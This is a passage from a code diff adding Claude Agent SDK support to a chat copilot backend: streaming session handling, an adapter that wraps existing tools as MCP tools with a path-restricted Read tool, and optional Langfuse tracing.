||||||
|
role="user" if is_user_message else "assistant", content=message
|
||||||
|
)
|
||||||
|
)
|
||||||
|
if is_user_message:
|
||||||
|
track_user_message(
|
||||||
|
user_id=user_id, session_id=session_id, message_length=len(message)
|
||||||
|
)
|
||||||
|
|
||||||
|
session = await upsert_chat_session(session)
|
||||||
|
|
||||||
|
# Generate title for new sessions (first user message)
|
||||||
|
if is_user_message and not session.title:
|
||||||
|
user_messages = [m for m in session.messages if m.role == "user"]
|
||||||
|
if len(user_messages) == 1:
|
||||||
|
first_message = user_messages[0].content or message or ""
|
||||||
|
if first_message:
|
||||||
|
task = asyncio.create_task(
|
||||||
|
_update_title_async(session_id, first_message, user_id)
|
||||||
|
)
|
||||||
|
_background_tasks.add(task)
|
||||||
|
task.add_done_callback(_background_tasks.discard)
|
||||||
|
|
||||||
|
# Build system prompt (reuses non-SDK path with Langfuse support)
|
||||||
|
has_history = len(session.messages) > 1
|
||||||
|
system_prompt, _ = await _build_system_prompt(
|
||||||
|
user_id, has_conversation_history=has_history
|
||||||
|
)
|
||||||
|
system_prompt += _SDK_TOOL_SUPPLEMENT
|
||||||
|
message_id = str(uuid.uuid4())
|
||||||
|
text_block_id = str(uuid.uuid4())
|
||||||
|
task_id = str(uuid.uuid4())
|
||||||
|
|
||||||
|
yield StreamStart(messageId=message_id, taskId=task_id)
|
||||||
|
|
||||||
|
stream_completed = False
|
||||||
|
# Use a session-specific temp dir to avoid cleanup race conditions
|
||||||
|
# between concurrent sessions.
|
||||||
|
sdk_cwd = _make_sdk_cwd(session_id)
|
||||||
|
os.makedirs(sdk_cwd, exist_ok=True)
|
||||||
|
|
||||||
|
set_execution_context(user_id, session, None)
|
||||||
|
|
||||||
|
try:
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
|
||||||
|
|
||||||
|
mcp_server = create_copilot_mcp_server()
|
||||||
|
|
||||||
|
# Initialize Langfuse tracing (no-op if not configured)
|
||||||
|
tracer = TracedSession(session_id, user_id, system_prompt)
|
||||||
|
|
||||||
|
# Merge security hooks with optional tracing hooks
|
||||||
|
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
|
||||||
|
tracing_hooks = create_tracing_hooks(tracer)
|
||||||
|
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
|
||||||
|
|
||||||
|
options = ClaudeAgentOptions(
|
||||||
|
system_prompt=system_prompt,
|
||||||
|
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
|
||||||
|
allowed_tools=COPILOT_TOOL_NAMES,
|
||||||
|
hooks=combined_hooks, # type: ignore[arg-type]
|
||||||
|
cwd=sdk_cwd,
|
||||||
|
max_buffer_size=config.sdk_max_buffer_size,
|
||||||
|
)
|
||||||
|
|
||||||
|
adapter = SDKResponseAdapter(message_id=message_id)
|
||||||
|
adapter.set_task_id(task_id)
|
||||||
|
|
||||||
|
async with tracer, ClaudeSDKClient(options=options) as client:
|
||||||
|
current_message = message or ""
|
||||||
|
if not current_message and session.messages:
|
||||||
|
last_user = [m for m in session.messages if m.role == "user"]
|
||||||
|
if last_user:
|
||||||
|
current_message = last_user[-1].content or ""
|
||||||
|
|
||||||
|
if not current_message.strip():
|
||||||
|
yield StreamError(
|
||||||
|
errorText="Message cannot be empty.",
|
||||||
|
code="empty_prompt",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
return
|
||||||
|
|
||||||
|
# Build query with conversation history context.
|
||||||
|
# Compress history first to handle long conversations.
|
||||||
|
query_message = current_message
|
||||||
|
if len(session.messages) > 1:
|
||||||
|
compressed = await _compress_conversation_history(session)
|
||||||
|
history_context = _format_conversation_context(compressed)
|
||||||
|
if history_context:
|
||||||
|
query_message = (
|
||||||
|
f"{history_context}\n\n"
|
||||||
|
f"Now, the user says:\n{current_message}"
|
||||||
|
)
|
||||||
|
|
||||||
|
logger.info(
|
||||||
|
f"[SDK] Sending query: {current_message[:80]!r}"
|
||||||
|
f" ({len(session.messages)} msgs in session)"
|
||||||
|
)
|
||||||
|
tracer.log_user_message(current_message)
|
||||||
|
await client.query(query_message, session_id=session_id)
|
||||||
|
|
||||||
|
assistant_response = ChatMessage(role="assistant", content="")
|
||||||
|
accumulated_tool_calls: list[dict[str, Any]] = []
|
||||||
|
has_appended_assistant = False
|
||||||
|
has_tool_results = False
|
||||||
|
|
||||||
|
async for sdk_msg in client.receive_messages():
|
||||||
|
logger.debug(
|
||||||
|
f"[SDK] Received: {type(sdk_msg).__name__} "
|
||||||
|
f"{getattr(sdk_msg, 'subtype', '')}"
|
||||||
|
)
|
||||||
|
tracer.log_sdk_message(sdk_msg)
|
||||||
|
for response in adapter.convert_message(sdk_msg):
|
||||||
|
if isinstance(response, StreamStart):
|
||||||
|
continue
|
||||||
|
yield response
|
||||||
|
|
||||||
|
if isinstance(response, StreamTextDelta):
|
||||||
|
delta = response.delta or ""
|
||||||
|
# After tool results, start a new assistant
|
||||||
|
# message for the post-tool text.
|
||||||
|
if has_tool_results and has_appended_assistant:
|
||||||
|
assistant_response = ChatMessage(
|
||||||
|
role="assistant", content=delta
|
||||||
|
)
|
||||||
|
accumulated_tool_calls = []
|
||||||
|
has_appended_assistant = False
|
||||||
|
has_tool_results = False
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
else:
|
||||||
|
assistant_response.content = (
|
||||||
|
assistant_response.content or ""
|
||||||
|
) + delta
|
||||||
|
if not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamToolInputAvailable):
|
||||||
|
accumulated_tool_calls.append(
|
||||||
|
{
|
||||||
|
"id": response.toolCallId,
|
||||||
|
"type": "function",
|
||||||
|
"function": {
|
||||||
|
"name": response.toolName,
|
||||||
|
"arguments": json.dumps(response.input or {}),
|
||||||
|
},
|
||||||
|
}
|
||||||
|
)
|
||||||
|
assistant_response.tool_calls = accumulated_tool_calls
|
||||||
|
if not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamToolOutputAvailable):
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
||||||
|
role="tool",
|
||||||
|
content=(
|
||||||
|
response.output
|
||||||
|
if isinstance(response.output, str)
|
||||||
|
else str(response.output)
|
||||||
|
),
|
||||||
|
tool_call_id=response.toolCallId,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
has_tool_results = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamFinish):
|
||||||
|
stream_completed = True
|
||||||
|
|
||||||
|
if stream_completed:
|
||||||
|
break
|
||||||
|
|
||||||
|
if (
|
||||||
|
assistant_response.content or assistant_response.tool_calls
|
||||||
|
) and not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
|
||||||
|
except ImportError:
|
||||||
|
logger.warning(
|
||||||
|
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
|
||||||
|
)
|
||||||
|
async for response in stream_with_anthropic(
|
||||||
|
session, system_prompt, text_block_id
|
||||||
|
):
|
||||||
|
if isinstance(response, StreamFinish):
|
||||||
|
stream_completed = True
|
||||||
|
yield response
|
||||||
|
|
||||||
|
await upsert_chat_session(session)
|
||||||
|
logger.debug(
|
||||||
|
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
|
||||||
|
)
|
||||||
|
if not stream_completed:
|
||||||
|
yield StreamFinish()
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"[SDK] Error: {e}", exc_info=True)
|
||||||
|
try:
|
||||||
|
await upsert_chat_session(session)
|
||||||
|
except Exception as save_err:
|
||||||
|
logger.error(f"[SDK] Failed to save session on error: {save_err}")
|
||||||
|
yield StreamError(
|
||||||
|
errorText="An error occurred. Please try again.",
|
||||||
|
code="sdk_error",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
finally:
|
||||||
|
_cleanup_sdk_tool_results(sdk_cwd)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_title_async(
|
||||||
|
session_id: str, message: str, user_id: str | None = None
|
||||||
|
) -> None:
|
||||||
|
"""Background task to update session title."""
|
||||||
|
try:
|
||||||
|
title = await _generate_session_title(
|
||||||
|
message, user_id=user_id, session_id=session_id
|
||||||
|
)
|
||||||
|
if title:
|
||||||
|
await update_session_title(session_id, title)
|
||||||
|
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"[SDK] Failed to update session title: {e}")
|
||||||
@@ -0,0 +1,321 @@
|
|||||||
|
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
|
||||||
|
|
||||||
|
This module provides the adapter layer that converts existing BaseTool implementations
|
||||||
|
into in-process MCP tools that can be used with the Claude Agent SDK.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import uuid
|
||||||
|
from contextvars import ContextVar
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from backend.api.features.chat.model import ChatSession
|
||||||
|
from backend.api.features.chat.tools import TOOL_REGISTRY
|
||||||
|
from backend.api.features.chat.tools.base import BaseTool
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
|
||||||
|
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
|
||||||
|
|
||||||
|
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
|
||||||
|
MCP_SERVER_NAME = "copilot"
|
||||||
|
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
|
||||||
|
|
||||||
|
# Context variables to pass user/session info to tool execution
|
||||||
|
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
|
||||||
|
_current_session: ContextVar[ChatSession | None] = ContextVar(
|
||||||
|
"current_session", default=None
|
||||||
|
)
|
||||||
|
_current_tool_call_id: ContextVar[str | None] = ContextVar(
|
||||||
|
"current_tool_call_id", default=None
|
||||||
|
)
|
||||||
|
|
||||||
|
# Stash for MCP tool outputs before the SDK potentially truncates them.
|
||||||
|
# Keyed by tool_name → full output string. Consumed (popped) by the
|
||||||
|
# response adapter when it builds StreamToolOutputAvailable.
|
||||||
|
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
|
||||||
|
"pending_tool_outputs", default=None # type: ignore[arg-type]
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def set_execution_context(
|
||||||
|
user_id: str | None,
|
||||||
|
session: ChatSession,
|
||||||
|
tool_call_id: str | None = None,
|
||||||
|
) -> None:
|
||||||
|
"""Set the execution context for tool calls.
|
||||||
|
|
||||||
|
This must be called before streaming begins to ensure tools have access
|
||||||
|
to user_id and session information.
|
||||||
|
"""
|
||||||
|
_current_user_id.set(user_id)
|
||||||
|
_current_session.set(session)
|
||||||
|
_current_tool_call_id.set(tool_call_id)
|
||||||
|
_pending_tool_outputs.set({})
|
||||||
|
|
||||||
|
|
||||||
|
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
|
||||||
|
"""Get the current execution context."""
|
||||||
|
return (
|
||||||
|
_current_user_id.get(),
|
||||||
|
_current_session.get(),
|
||||||
|
_current_tool_call_id.get(),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def pop_pending_tool_output(tool_name: str) -> str | None:
|
||||||
|
"""Pop and return the stashed full output for *tool_name*.
|
||||||
|
|
||||||
|
The SDK CLI may truncate large tool results (writing them to disk and
|
||||||
|
replacing the content with a file reference). This stash keeps the
|
||||||
|
original MCP output so the response adapter can forward it to the
|
||||||
|
frontend for proper widget rendering.
|
||||||
|
|
||||||
|
Returns ``None`` if nothing was stashed for *tool_name*.
|
||||||
|
"""
|
||||||
|
pending = _pending_tool_outputs.get(None)
|
||||||
|
if pending is None:
|
||||||
|
return None
|
||||||
|
return pending.pop(tool_name, None)
|
||||||
|
|
||||||
|
|
||||||
|
def create_tool_handler(base_tool: BaseTool):
|
||||||
|
"""Create an async handler function for a BaseTool.
|
||||||
|
|
||||||
|
This wraps the existing BaseTool._execute method to be compatible
|
||||||
|
with the Claude Agent SDK MCP tool format.
|
||||||
|
"""
|
||||||
|
|
||||||
|
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
|
||||||
|
"""Execute the wrapped tool and return MCP-formatted response."""
|
||||||
|
user_id, session, tool_call_id = get_execution_context()
|
||||||
|
|
||||||
|
if session is None:
|
||||||
|
return {
|
||||||
|
"content": [
|
||||||
|
{
|
||||||
|
"type": "text",
|
||||||
|
"text": json.dumps(
|
||||||
|
{
|
||||||
|
"error": "No session context available",
|
||||||
|
"type": "error",
|
||||||
|
}
|
||||||
|
),
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"isError": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Call the existing tool's execute method
|
||||||
|
# Generate unique tool_call_id per invocation for proper correlation
|
||||||
|
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
|
||||||
|
result = await base_tool.execute(
|
||||||
|
user_id=user_id,
|
||||||
|
session=session,
|
||||||
|
tool_call_id=effective_id,
|
||||||
|
**args,
|
||||||
|
)
|
||||||
|
|
||||||
|
# The result is a StreamToolOutputAvailable, extract the output
|
||||||
|
text = (
|
||||||
|
result.output
|
||||||
|
if isinstance(result.output, str)
|
||||||
|
else json.dumps(result.output)
|
||||||
|
)
|
||||||
|
|
||||||
|
# Stash the full output before the SDK potentially truncates it.
|
||||||
|
# The response adapter will pop this for frontend widget rendering.
|
||||||
|
pending = _pending_tool_outputs.get(None)
|
||||||
|
if pending is not None:
|
||||||
|
pending[base_tool.name] = text
|
||||||
|
|
||||||
|
return {
|
||||||
|
"content": [{"type": "text", "text": text}],
|
||||||
|
"isError": not result.success,
|
||||||
|
}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
|
||||||
|
return {
|
||||||
|
"content": [
|
||||||
|
{
|
||||||
|
"type": "text",
|
||||||
|
"text": json.dumps(
|
||||||
|
{
|
||||||
|
"error": str(e),
|
||||||
|
"type": "error",
|
||||||
|
"message": f"Failed to execute {base_tool.name}",
|
||||||
|
}
|
||||||
|
),
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"isError": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
return tool_handler
|
||||||
|
|
||||||
|
|
||||||
|
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
|
||||||
|
"""Build a JSON Schema input schema for a tool."""
|
||||||
|
return {
|
||||||
|
"type": "object",
|
||||||
|
"properties": base_tool.parameters.get("properties", {}),
|
||||||
|
"required": base_tool.parameters.get("required", []),
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def get_tool_definitions() -> list[dict[str, Any]]:
|
||||||
|
"""Get all tool definitions in MCP format.
|
||||||
|
|
||||||
|
Returns a list of tool definitions that can be used with
|
||||||
|
create_sdk_mcp_server or as raw tool definitions.
|
||||||
|
"""
|
||||||
|
tool_definitions = []
|
||||||
|
|
||||||
|
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||||
|
tool_def = {
|
||||||
|
"name": tool_name,
|
||||||
|
"description": base_tool.description,
|
||||||
|
"inputSchema": _build_input_schema(base_tool),
|
||||||
|
}
|
||||||
|
tool_definitions.append(tool_def)
|
||||||
|
|
||||||
|
return tool_definitions
|
||||||
|
|
||||||
|
|
||||||
|
def get_tool_handlers() -> dict[str, Any]:
|
||||||
|
"""Get all tool handlers mapped by name.
|
||||||
|
|
||||||
|
Returns a dictionary mapping tool names to their handler functions.
|
||||||
|
"""
|
||||||
|
handlers = {}
|
||||||
|
|
||||||
|
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||||
|
handlers[tool_name] = create_tool_handler(base_tool)
|
||||||
|
|
||||||
|
return handlers
|
||||||
|
|
||||||
|
|
||||||
|
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
|
||||||
|
"""Read a file with optional offset/limit. Restricted to SDK working directory.
|
||||||
|
|
||||||
|
After reading, the file is deleted to prevent accumulation in long-running pods.
|
||||||
|
"""
|
||||||
|
file_path = args.get("file_path", "")
|
||||||
|
offset = args.get("offset", 0)
|
||||||
|
limit = args.get("limit", 2000)
|
||||||
|
|
||||||
|
# Security: only allow reads under the SDK's working directory
|
||||||
|
real_path = os.path.realpath(file_path)
|
||||||
|
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
|
||||||
|
return {
|
||||||
|
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
|
||||||
|
"isError": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(real_path) as f:
|
||||||
|
lines = f.readlines()
|
||||||
|
selected = lines[offset : offset + limit]
|
||||||
|
content = "".join(selected)
|
||||||
|
return {"content": [{"type": "text", "text": content}], "isError": False}
|
||||||
|
except FileNotFoundError:
|
||||||
|
return {
|
||||||
|
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
|
||||||
|
"isError": True,
|
||||||
|
}
|
||||||
|
except Exception as e:
|
||||||
|
return {
|
||||||
|
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
|
||||||
|
"isError": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
_READ_TOOL_NAME = "Read"
|
||||||
|
_READ_TOOL_DESCRIPTION = (
|
||||||
|
"Read a file from the local filesystem. "
|
||||||
|
"Use offset and limit to read specific line ranges for large files."
|
||||||
|
)
|
||||||
|
_READ_TOOL_SCHEMA = {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"file_path": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "The absolute path to the file to read",
|
||||||
|
},
|
||||||
|
"offset": {
|
||||||
|
"type": "integer",
|
||||||
|
"description": "Line number to start reading from (0-indexed). Default: 0",
|
||||||
|
},
|
||||||
|
"limit": {
|
||||||
|
"type": "integer",
|
||||||
|
"description": "Number of lines to read. Default: 2000",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"required": ["file_path"],
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Create the MCP server configuration
|
||||||
|
def create_copilot_mcp_server():
|
||||||
|
"""Create an in-process MCP server configuration for CoPilot tools.
|
||||||
|
|
||||||
|
This can be passed to ClaudeAgentOptions.mcp_servers.
|
||||||
|
|
||||||
|
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
|
||||||
|
package being available. This function returns the configuration that
|
||||||
|
can be used with the SDK.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import create_sdk_mcp_server, tool
|
||||||
|
|
||||||
|
# Create decorated tool functions
|
||||||
|
sdk_tools = []
|
||||||
|
|
||||||
|
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||||
|
handler = create_tool_handler(base_tool)
|
||||||
|
decorated = tool(
|
||||||
|
tool_name,
|
||||||
|
base_tool.description,
|
||||||
|
_build_input_schema(base_tool),
|
||||||
|
)(handler)
|
||||||
|
sdk_tools.append(decorated)
|
||||||
|
|
||||||
|
# Add the Read tool so the SDK can read back oversized tool results
|
||||||
|
read_tool = tool(
|
||||||
|
_READ_TOOL_NAME,
|
||||||
|
_READ_TOOL_DESCRIPTION,
|
||||||
|
_READ_TOOL_SCHEMA,
|
||||||
|
)(_read_file_handler)
|
||||||
|
sdk_tools.append(read_tool)
|
||||||
|
|
||||||
|
server = create_sdk_mcp_server(
|
||||||
|
name=MCP_SERVER_NAME,
|
||||||
|
version="1.0.0",
|
||||||
|
tools=sdk_tools,
|
||||||
|
)
|
||||||
|
|
||||||
|
return server
|
||||||
|
|
||||||
|
except ImportError:
|
||||||
|
# Let ImportError propagate so service.py handles the fallback
|
||||||
|
raise
|
||||||
|
|
||||||
|
|
||||||
|
# SDK built-in tools allowed within the workspace directory.
|
||||||
|
# Security hooks validate that file paths stay within sdk_cwd
|
||||||
|
# and that Bash commands are restricted to a safe allowlist.
|
||||||
|
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
|
||||||
|
|
||||||
|
# List of tool names for allowed_tools configuration
|
||||||
|
# Include MCP tools, the MCP Read tool for oversized results,
|
||||||
|
# and SDK built-in file tools for workspace operations.
|
||||||
|
COPILOT_TOOL_NAMES = [
|
||||||
|
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
|
||||||
|
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
|
||||||
|
*_SDK_BUILTIN_TOOLS,
|
||||||
|
]
|
||||||
@@ -0,0 +1,426 @@
|
|||||||
|
"""Langfuse tracing integration for Claude Agent SDK.
|
||||||
|
|
||||||
|
This module provides modular, non-invasive observability for SDK sessions.
|
||||||
|
All tracing is opt-in (only active when Langfuse credentials are configured)
|
||||||
|
and designed to not affect the core execution flow.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
async with TracedSession(session_id, user_id) as tracer:
|
||||||
|
# Your SDK code here
|
||||||
|
tracer.log_user_message(message)
|
||||||
|
async for sdk_msg in client.receive_messages():
|
||||||
|
tracer.log_sdk_message(sdk_msg)
|
||||||
|
tracer.log_result(result_message)
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import time
|
||||||
|
from contextlib import asynccontextmanager
|
||||||
|
from dataclasses import dataclass, field
|
||||||
|
from typing import TYPE_CHECKING, Any
|
||||||
|
|
||||||
|
from backend.util.settings import Settings
|
||||||
|
|
||||||
|
if TYPE_CHECKING:
|
||||||
|
from claude_agent_sdk import Message, ResultMessage
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
settings = Settings()
|
||||||
|
|
||||||
|
|
||||||
|
def _is_langfuse_configured() -> bool:
|
||||||
|
"""Check if Langfuse credentials are configured."""
|
||||||
|
return bool(
|
||||||
|
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass
|
||||||
|
class ToolSpan:
|
||||||
|
"""Tracks a single tool call for tracing."""
|
||||||
|
|
||||||
|
tool_call_id: str
|
||||||
|
tool_name: str
|
||||||
|
input: dict[str, Any]
|
||||||
|
start_time: float = field(default_factory=time.perf_counter)
|
||||||
|
output: str | None = None
|
||||||
|
success: bool = True
|
||||||
|
end_time: float | None = None
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass
|
||||||
|
class GenerationSpan:
|
||||||
|
"""Tracks an LLM generation (text output) for tracing."""
|
||||||
|
|
||||||
|
text: str = ""
|
||||||
|
start_time: float = field(default_factory=time.perf_counter)
|
||||||
|
end_time: float | None = None
|
||||||
|
tool_calls: list[ToolSpan] = field(default_factory=list)
|
||||||
|
|
||||||
|
|
||||||
|
class TracedSession:
|
||||||
|
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
|
||||||
|
|
||||||
|
Automatically creates a trace with:
|
||||||
|
- Session-level metadata (user_id, session_id)
|
||||||
|
- Generation spans for LLM outputs
|
||||||
|
- Tool call spans with input/output
|
||||||
|
- Token usage and cost (from ResultMessage)
|
||||||
|
|
||||||
|
If Langfuse is not configured, all methods are no-ops.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
session_id: str,
|
||||||
|
user_id: str | None = None,
|
||||||
|
system_prompt: str | None = None,
|
||||||
|
):
|
||||||
|
self.session_id = session_id
|
||||||
|
self.user_id = user_id
|
||||||
|
self.system_prompt = system_prompt
|
||||||
|
self.enabled = _is_langfuse_configured()
|
||||||
|
|
||||||
|
# Internal state
|
||||||
|
self._trace: Any = None
|
||||||
|
self._langfuse: Any = None
|
||||||
|
self._user_message: str | None = None
|
||||||
|
self._generations: list[GenerationSpan] = []
|
||||||
|
self._current_generation: GenerationSpan | None = None
|
||||||
|
self._pending_tools: dict[str, ToolSpan] = {}
|
||||||
|
self._start_time: float = 0
|
||||||
|
|
||||||
|
async def __aenter__(self) -> TracedSession:
|
||||||
|
"""Start the trace."""
|
||||||
|
if not self.enabled:
|
||||||
|
return self
|
||||||
|
|
||||||
|
try:
|
||||||
|
from langfuse import get_client
|
||||||
|
|
||||||
|
self._langfuse = get_client()
|
||||||
|
self._start_time = time.perf_counter()
|
||||||
|
|
||||||
|
# Create the root trace
|
||||||
|
self._trace = self._langfuse.trace(
|
||||||
|
name="copilot-sdk-session",
|
||||||
|
session_id=self.session_id,
|
||||||
|
user_id=self.user_id,
|
||||||
|
metadata={
|
||||||
|
"sdk": "claude-agent-sdk",
|
||||||
|
"has_system_prompt": bool(self.system_prompt),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"[Tracing] Failed to start trace: {e}")
|
||||||
|
self.enabled = False
|
||||||
|
|
||||||
|
return self
|
||||||
|
|
||||||
|
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
|
||||||
|
"""End the trace and flush to Langfuse."""
|
||||||
|
if not self.enabled or not self._trace:
|
||||||
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Finalize any open generation
|
||||||
|
self._finalize_current_generation()
|
||||||
|
|
||||||
|
# Add generations as spans
|
||||||
|
for gen in self._generations:
|
||||||
|
self._trace.span(
|
||||||
|
name="llm-generation",
|
||||||
|
start_time=gen.start_time,
|
||||||
|
end_time=gen.end_time or time.perf_counter(),
|
||||||
|
output=gen.text[:1000] if gen.text else None, # Truncate
|
||||||
|
metadata={"tool_calls": len(gen.tool_calls)},
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add tool calls as nested spans
|
||||||
|
for tool in gen.tool_calls:
|
||||||
|
self._trace.span(
|
||||||
|
name=f"tool:{tool.tool_name}",
|
||||||
|
start_time=tool.start_time,
|
||||||
|
end_time=tool.end_time or time.perf_counter(),
|
||||||
|
input=tool.input,
|
||||||
|
output=tool.output[:500] if tool.output else None,
|
||||||
|
metadata={
|
||||||
|
"tool_call_id": tool.tool_call_id,
|
||||||
|
"success": tool.success,
|
||||||
|
},
|
||||||
|
)
|
||||||
|
|
||||||
|
# Update trace with final status
|
||||||
|
status = "error" if exc_type else "success"
|
||||||
|
self._trace.update(
|
||||||
|
output=self._generations[-1].text[:500] if self._generations else None,
|
||||||
|
metadata={"status": status, "num_generations": len(self._generations)},
|
||||||
|
)
|
||||||
|
|
||||||
|
# Flush asynchronously (Langfuse handles this in background)
|
||||||
|
logger.debug(
|
||||||
|
f"[Tracing] Completed trace for session {self.session_id}, "
|
||||||
|
f"{len(self._generations)} generations"
|
||||||
|
)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
|
||||||
|
|
||||||
|
def log_user_message(self, message: str) -> None:
|
||||||
|
"""Log the user's input message."""
|
||||||
|
if not self.enabled or not self._trace:
|
||||||
|
return
|
||||||
|
|
||||||
|
self._user_message = message
|
||||||
|
try:
|
||||||
|
self._trace.update(input=message[:1000])
|
||||||
|
except Exception as e:
|
||||||
|
logger.debug(f"[Tracing] Failed to log user message: {e}")
|
||||||
|
|
||||||
|
def log_sdk_message(self, sdk_message: Message) -> None:
|
||||||
|
"""Log an SDK message (automatically categorizes by type)."""
|
||||||
|
if not self.enabled:
|
||||||
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import (
|
||||||
|
AssistantMessage,
|
||||||
|
ResultMessage,
|
||||||
|
TextBlock,
|
||||||
|
ToolResultBlock,
|
||||||
|
ToolUseBlock,
|
||||||
|
UserMessage,
|
||||||
|
)
|
||||||
|
|
||||||
|
if isinstance(sdk_message, AssistantMessage):
|
||||||
|
# Start a new generation if needed
|
||||||
|
if self._current_generation is None:
|
||||||
|
self._current_generation = GenerationSpan()
|
||||||
|
self._generations.append(self._current_generation)
|
||||||
|
|
||||||
|
for block in sdk_message.content:
|
||||||
|
if isinstance(block, TextBlock) and block.text:
|
||||||
|
self._current_generation.text += block.text
|
||||||
|
|
||||||
|
elif isinstance(block, ToolUseBlock):
|
||||||
|
tool_span = ToolSpan(
|
||||||
|
tool_call_id=block.id,
|
||||||
|
tool_name=block.name,
|
||||||
|
input=block.input or {},
|
||||||
|
)
|
||||||
|
self._pending_tools[block.id] = tool_span
|
||||||
|
if self._current_generation:
|
||||||
|
self._current_generation.tool_calls.append(tool_span)
|
||||||
|
|
||||||
|
elif isinstance(sdk_message, UserMessage):
|
||||||
|
# UserMessage carries tool results
|
||||||
|
content = sdk_message.content
|
||||||
|
blocks = content if isinstance(content, list) else []
|
||||||
|
for block in blocks:
|
||||||
|
if isinstance(block, ToolResultBlock) and block.tool_use_id:
|
||||||
|
tool_span = self._pending_tools.get(block.tool_use_id)
|
||||||
|
if tool_span:
|
||||||
|
tool_span.end_time = time.perf_counter()
|
||||||
|
tool_span.success = not (block.is_error or False)
|
||||||
|
tool_span.output = self._extract_tool_output(block.content)
|
||||||
|
|
||||||
|
# After tool results, finalize current generation
|
||||||
|
# (SDK will start a new AssistantMessage for continuation)
|
||||||
|
self._finalize_current_generation()
|
||||||
|
|
||||||
|
elif isinstance(sdk_message, ResultMessage):
|
||||||
|
self._log_result(sdk_message)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
